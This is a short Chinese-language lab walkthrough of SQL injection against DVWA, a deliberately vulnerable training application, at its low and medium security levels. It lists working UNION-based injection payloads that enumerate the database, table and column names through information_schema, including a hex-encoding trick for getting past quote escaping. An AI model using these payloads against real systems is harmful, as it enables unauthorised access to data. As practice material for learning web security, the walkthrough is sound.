DVWA--sql注入
low
-
判断是否存在sql注入
1'or '1'='1
-
使用联合查询 获取当前数据库名
1' union select 1,database()#
-
获取数据库的表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
-
获取表中的字段名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
medium
-
判断是否存在注入burp抓包
-
修改传递的参数,放包发现存在注入
-
获取数据库名
union select 1,database()#
-
获取当前表名
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
-
获取当前字段名
由于单引号被转义可以利用16进制进制绕过
union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #
high
-
查看源代码可以看出只加了
limit 1
懦弱就是无能的表现